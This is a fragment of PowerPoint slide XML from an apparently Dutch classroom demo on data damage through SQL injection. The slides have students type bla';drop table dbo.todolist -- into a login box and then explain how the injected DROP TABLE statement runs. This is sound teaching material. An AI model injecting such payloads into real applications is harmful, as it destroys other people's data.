          <p:cNvPr id="14" name="Afbeelding 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3573277" y="2097465"/>
            <a:ext cx="4002105" cy="1516587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208188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5526183" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>Het algemene plaatje </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0353" y="3208344"/>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web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8"/>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604139" y="3678572"/>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412240" y="5133773"/>
            <a:ext cx="2357120" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Wat zou hier nu fout kunnen gaan?</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3324485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de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>loginbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>.</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beschadigen van informatie(merkbaar)</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886334" y="4743668"/>
            <a:ext cx="4723303" cy="1754326"/>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Een hacker kan hier ook achter komen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>. Dat wordt later nog getoond. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Voor nu, weet dat deze info ook via SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> verkregen kan worden. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Deze demo zoomt in op wat een hacker daarna kan gaan doen met deze info.</a:t>
            </a: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79505" y="2930695"/>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8063" y="2867176"/>
            <a:ext cx="1343314" cy="1324786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Tekstvak 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7129656" y="4069583"/>
            <a:ext cx="4696169" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Student2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: (de Webserver)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> de SQL Server management console, kijk</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>   welke tabellen er allemaal zijn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Vrije vorm 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4170066" y="2994402"/>
            <a:ext cx="3456633" cy="582811"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3456633"/>
              <a:gd name="connsiteY0" fmla="*/ 582811 h 582811"/>
              <a:gd name="connsiteX1" fmla="*/ 1557494 w 3456633"/>
              <a:gd name="connsiteY1" fmla="*/ 7 h 582811"/>
              <a:gd name="connsiteX2" fmla="*/ 3456633 w 3456633"/>
              <a:gd name="connsiteY2" fmla="*/ 572763 h 582811"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3456633" h="582811">
                <a:moveTo>
                  <a:pt x="0" y="582811"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="490694" y="292246"/>
                  <a:pt x="981389" y="1682"/>
                  <a:pt x="1557494" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2133599" y="-1668"/>
                  <a:pt x="2795116" y="285547"/>
                  <a:pt x="3456633" y="572763"/>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2"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5847" y="3451118"/>
            <a:ext cx="565639" cy="3181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83851" y="3440830"/>
            <a:ext cx="584526" cy="318172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248651" y="2600947"/>
            <a:ext cx="1107440" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kabel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Tekstvak 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1645274" y="4066669"/>
            <a:ext cx="3205424" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Student1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: (de Client)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Afbeelding 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069388" y="5037181"/>
            <a:ext cx="4194814" cy="1808109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3365330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informatie(merkbaar)</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031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 1</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drop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dbo.todolist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Klik op login ........ wat gebeurt er?  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394203" y="5225173"/>
            <a:ext cx="4714818" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Kijk hier na in de database en constateer dat de tabel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>todolist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> verdwenen is.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1873200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nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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informatie(merkbaar)</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Uitleg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Hoe kan dit?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Door de input als zodanig in te voeren wordt de query in de code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> gebruikers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla';drop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dbo.todolist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     password=''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Bij SQL wordt alles achter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> gezien als commentaar. Blijft over</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> gebruikers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>drop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dbo.todolist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Bovenstaande query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>logged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> niemand in... maar delete wel een tabel</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="984738" y="5088833"/>
            <a:ext cx="10440238" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Het password doet niet meer mee nu en... een "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>" betekent: er komt nog een commando, de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>drop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>idg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3688937" y="1096894"/>
            <a:ext cx="8228408" cy="6503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i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>beschadigen van informatie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
